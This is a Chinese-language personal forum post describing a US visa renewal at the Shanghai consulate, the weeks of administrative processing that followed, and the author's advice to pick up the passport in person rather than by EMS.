因为家里有事，只有冒险回来了。由于在学期里，要赶回去上课。现在被check还真是很麻烦。
我2009年5月4日在上海美国大使馆反签H1B非常顺利。这次就不行了，虽然不是F1旺期，还是有很多人去签证。5月18日下午到上海浦东，第二天就赶去银行（中信）交钱（966元，又涨了），好在赶到9点40分到。原来以为时间没关系的。没想到，政策变了。1）要按照预约时间（前后可以相差1小时） 2）只要网上填160表，不要156，157和照片了。 有几个人约8点半，9点半超过才到，保安就是不让进，还有人约12点，10点就来了，保安让他们等11点再来排队。
这次碰到了6号的严肃大哥。他之前拒了n个B类签证。我碰到他，就觉得不妙。我自认英文口语还是很好的。他问了很多问题，还和同事讨论了，问了我的 research statement and CV.还问了怎么转学生签证了。做什么研究的。他同事说没问题，我那时很高兴，心想应该没问题。没想到，他说“Everything looks all right. But it may take two to three weeks to process your visa"。我的天，为什么。我就告诉他：我已经定了回程机票，他问了我当天的日期，然后想了一会儿，说，你可能要改期。我觉得他有点不耐烦了，我也就没多问，他说让我一个礼拜之后再去问问。我就只能走了。心里当然很不爽。他什么都没有给我，连EMS的收据都没给我。他没有要我的旧护照，我的新护照是在纽约拿的。什么都没有。没有签证和出入境记录。我真是纳闷，他就看了我的旧护照，然后还给我了。
我回到家，就忙着很多事。也没多想，觉得如果要是被check了也是神的安排，天意。
我有个疑问，一般被check，他应该给个粉红条子的。告诉你怎么询问。我的情况，他什么都没有给我。也没有说check，就是说要花久点时间处理。有没有朋友在上海大使馆反签F1碰到和我一样的经历。
我后来才发前19日当天下午，大使馆给我发了email，我是21号早上才看到。好后悔自己没有查学校的邮箱。让我把我5年内的出入境记录传真给他们。郁闷。把握旧护照拿去不就好了。这个傻签证官。对他不是大事，就是慢慢处理，可是对我就是大事啊，造成了很多麻烦。
大使馆的第一份email原始内容：

我10月21日早上才看到，立马按照那个传真号码。没有任何回复。而且还扫描了一份电子版发给他们。只是收到一个自动回复。如下：

然后之后一周，发到那个邮箱，只是想要确认他们有没有收到传真。一直都是这个自动回复。
网上查了很多资料，找到了华盛顿的电话。
10月22日就让我美国的朋友打去问问。说是under administrative processing,这下才放心，至少资料都全了。
电话：202-6631225 (option: 1, then 0) - Department of States number. 给对方你的护照号，姓名和生日，就能查了。
10月27日让我美国的导师打去的。想看看能不能加快，因为我的机票是10月28日的。看来一点用都没有。
只有耐心等了，我还发传真和扫描到大使馆问。这次的回信有点不同。来自不同的email，不是自动回复了。

然后只有等。我自己基本每周打去华盛顿问一下。都说pending或administrative processing.不同的接听人，有时候说法不同，其实是一样的。
今天是11月9日，我倒是意外得到了个惊喜。我11月5日又写信去问。周一11月8日收到这个回信：

11月9日早上，因为没有任何预兆，我根本没想到会收到签证。还在睡觉。爸爸代我签收的快递。
奇怪的是，visa上写的是11月4日clear的，我11月5日打去华盛顿还在pending，那女的说还在pending。11月9日EMS特快专递到我家的。50元。我当初如果知道会被check，我就选择自取了。那说不定，早就拿到了。
建议上海朋友，自取。会要比EMS快！
